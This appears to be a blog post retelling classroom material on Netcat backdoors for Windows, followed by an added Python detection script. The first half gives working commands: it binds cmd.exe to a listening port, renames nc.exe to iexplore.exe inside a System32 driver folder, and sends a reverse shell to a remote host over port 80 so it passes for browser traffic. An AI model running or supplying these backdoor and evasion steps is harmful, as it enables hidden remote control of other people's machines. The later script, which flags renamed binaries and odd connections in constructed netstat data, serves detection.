I had this piece of information, which I came across when my professor was teaching a Netcat class. I don't have the whole article. Here is a piece that explains how a hacker can run the backdoor and also hide it from a not-so-smart network or system admin. It is technical. If you are interested in this type of information, read on.
Netcat backdoor, victim side: nc -L -d -p <port> -t -e cmd.exe
-L puts Netcat in listen mode. -d tells Netcat not to open a console window while running. -p sets the port to listen on. -t answers telnet negotiation. -e runs cmd.exe when a client connects.
Client side: nc -v <ip address of victim> <port>
Note: In this example Netcat runs in the background on the victim's machine. A system admin may open Task Manager and see that nc.exe is running. A smart hacker would rename nc.exe to something like iexplorer.exe or updatemanager.exe in order to avoid suspicion. Now, if a system administrator runs a trusted netstat -a -n command at the DOS prompt, he or she might notice that something is listening on a rather odd port, telnet to that port, and discover the trick. However, Windows uses several random ports for varying reasons, and netstat output can be time-consuming to parse, especially on systems with a lot of activity. Hackers might try a different approach. If they've infiltrated a Citrix server, for example, accessed by several users who are surfing the Web, you'd expect to see a lot of Domain Name System (DNS) lookups and Web connections. Running netstat -a -n would reveal a load of outgoing TCP port 80 connections. Instead of having an instance of Netcat listening on the Windows box and waiting for connections, Netcat can pipe the input and output of the cmd.exe program to another Netcat instance listening on a remote box on port 80. On his end, the hacker would run:
nc -l -p 80
From the Windows box, the hacker could cleverly “hide” Netcat again and issue these commands:
mkdir C:\Windows\System32\Drivers\q
move nc.exe C:\Windows\System32\Drivers\q\iexplore.exe
cd Windows\System32\Drivers\q
WINDOWS\System32\DRIVERS\q>iexplore.exe
Cmd line: -d -e cmd.exe originix 80
WINDOWS\System32\DRIVERS\q>
Now the listening Netcat should pick up the command shell from the Windows machine. This can do a better job of hiding a backdoor from a system administrator. At first glance, the connection will just look like Internet Explorer making a typical HTTP connection. Its only disadvantage for the hacker is that after terminating the shell, there’s no way of restarting it on the Windows side.
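The article's point is that netstat alone is hard to read on a busy box; the disguise falls apart, though, once you join the connection table to the owning process and its image path. The following is an added detection example written for this post (not code from the article): it parses a constructed netstat -ano listing and a constructed PID-to-image map, and flags a binary that uses a well-known name but runs from the wrong folder, a listener on a port the host is not supposed to expose, and outbound port 80 traffic from an unrecognised binary. The expected directories and known listening ports are assumptions to be tuned per host.

```python
# Added detection example (not from the original post): flag connections whose
# owning process does not look like what its name claims. Sample netstat and
# process data below are constructed; expected paths/ports are assumptions.
import re

# Constructed `netstat -ano` output from the host described above.
NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2316
  TCP    10.0.0.5:1043          203.0.113.7:80         ESTABLISHED     2320
  TCP    10.0.0.5:1044          203.0.113.9:80         ESTABLISHED     1504
"""
# Constructed PID -> image path map (what a process listing would give).
PROCESSES = {
    880: r"C:\Windows\System32\svchost.exe",
    2316: r"C:\Windows\System32\Drivers\q\updatemanager.exe",
    2320: r"C:\Windows\System32\Drivers\q\iexplore.exe",
    1504: r"C:\Program Files\Internet Explorer\iexplore.exe",
}
# Assumption: where these well-known binaries live on this build of Windows.
EXPECTED_DIRS = {
    "iexplore.exe": r"C:\Program Files\Internet Explorer",
    "svchost.exe": r"C:\Windows\System32",
}
# Assumption: ports this host is supposed to be listening on (per its role).
KNOWN_LISTEN_PORTS = {135, 139, 445}

LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")

def suspicious_connections(netstat_text, processes):
    """Return (pid, image, reason) for each connection that deserves a look."""
    findings = []
    for raw in netstat_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip headers, UDP lines, anything unparsable
        lport, rport, state, pid = int(m[2]), int(m[4]), m[5], int(m[6])
        image = processes.get(pid, "<unknown>")
        folder, _, name = image.rpartition("\\")
        name = name.lower()
        expected = EXPECTED_DIRS.get(name)
        if expected and folder.lower() != expected.lower():
            # A renamed nc.exe borrowing a browser's name lives in the wrong folder.
            findings.append((pid, image, f"{name} running from unexpected path"))
        elif state == "LISTENING" and lport not in KNOWN_LISTEN_PORTS:
            findings.append((pid, image, f"listener on unexpected port {lport}"))
        elif state == "ESTABLISHED" and rport == 80 and name not in EXPECTED_DIRS:
            # Outbound HTTP from a binary not on the allowlist; noisy, triage by path.
            findings.append((pid, image, "outbound port 80 from unrecognised binary"))
    return findings
```

On the sample data the real Internet Explorer connection (PID 1504) passes, while the renamed copy under Drivers\q and the odd-port listener are both reported.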